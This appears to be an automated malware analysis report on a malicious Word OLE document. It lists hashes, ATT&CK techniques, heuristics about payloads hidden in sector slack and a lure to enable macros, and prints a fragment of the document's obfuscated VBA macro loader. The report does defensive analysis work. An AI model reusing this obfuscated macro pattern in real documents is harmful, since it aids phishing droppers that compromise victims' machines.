Office (OLE) malware analysis — malicious · c4b20f7ef967ac06

MALICIOUS

Office (OLE)

210.0 KB Created: 2017-10-05 14:11:00 Authoring application: Microsoft Office Word First seen: 2020-05-25

MD5: 207132dc106b4e473f79793c6d34b3af SHA-1: efaddac81cf4b87a6dcc1752634ae63c2ff7aaad SHA-256: c4b20f7ef967ac0694d2fbeafcdcba0f2e581636711806a30345b525f1eff360

82 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is an OLE document containing VBA macros, with a heuristic indicating a lure to enable macros. The VBA code appears to be obfuscated but likely performs malicious actions such as downloading a payload. The presence of VBA macros and the lure to enable them strongly suggests a spearphishing attachment attack vector.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 215,040 bytes but its declared streams total only 126,115 bytes — 88,925 bytes (41%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1482 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1482 bytes
SHA-256: `baa996284fdbdc42557a1972b9b80c510135044222238ec4c8aff2d6a7e87b00`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "muse" Attribute VB_Base = "0{0DDCC70F-9313-4CB2-9902-4930CEABED4F}{565D2A9F-95E7-4FB3-A81E-7D188D04AC7F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Module1" Function embowel(hookah, fairymythology, synercus) #If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then Dim ardor As Integer Dim anserine As Byte Dim aguets As LongPtr Dim annexe As LongPtr Dim ages As LongPtr Dim mint As Variant Dim arius As LongPtr Dim heterometabolous As LongPtr #End If #If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then Dim annexe As Long Dim baptismal As Variant Dim aguets As Long Dim stumblingstone As Variant Dim arius As Long Dim pyrotechnics As Long Dim ages As Long Dim snappish As String Dim heterometabolous As Long Dim highpitched As Variant Dim defamation As String #End If millivoltmeter = chaplaincy chihuahua = Rnd(461) annexe = hookah heterometabolous = synercus chaplaincy = balaeniceps arius = fairymythology guenon = 20 + 3 hardbake = 29280 + 0 microsecond = 297550 + 5 Pmt 0, guenon, 13596, 10065, 4 chihuahua = chihuahua Or 245 aguets = 81 - 1 - 81 bon ByVal aguets, annexe, arius, heterometabolous, ages chihuahua = chihuahua - 158 End Function Attribute VB_Name = "Module2"

SHA-256: baa996284fdbdc42557a1972b9b80c510135044222238ec4c8aff2d6a7e87b00

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "muse"
Attribute VB_Base = "0{0DDCC70F-9313-4CB2-9902-4930CEABED4F}{565D2A9F-95E7-4FB3-A81E-7D188D04AC7F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module1"

Function embowel(hookah, fairymythology, synercus)
#If ((18 * 3) - (20 / 5)) > (24 / 6) And (Win64) > (90 - 15 * 6) * 2 Then
Dim ardor As Integer
Dim anserine As Byte
Dim aguets As LongPtr
Dim annexe As LongPtr
Dim ages As LongPtr
Dim mint As Variant
Dim arius As LongPtr
Dim heterometabolous As LongPtr
#End If
#If ((18 * 3) - (20 / 5)) > (24 / 6) And Not (Win64) > (90 - 15 * 6) * 2 Then
Dim annexe As Long
Dim baptismal As Variant
Dim aguets As Long
Dim stumblingstone As Variant
Dim arius As Long
Dim pyrotechnics As Long
Dim ages As Long
Dim snappish As String
Dim heterometabolous As Long
Dim highpitched As Variant
Dim defamation As String
#End If
millivoltmeter = chaplaincy
chihuahua = Rnd(461)
annexe = hookah
heterometabolous = synercus
chaplaincy = balaeniceps
arius = fairymythology
guenon = 20 + 3
hardbake = 29280 + 0
microsecond = 297550 + 5
 Pmt 0, guenon, 13596, 10065, 4

chihuahua = chihuahua Or 245
aguets = 81 - 1 - 81
bon ByVal aguets, annexe, arius, heterometabolous, ages
chihuahua = chihuahua - 158
End Function

Attribute VB_Name = "Module2"

Open this report in the interactive analyzer, or submit your own file for analysis.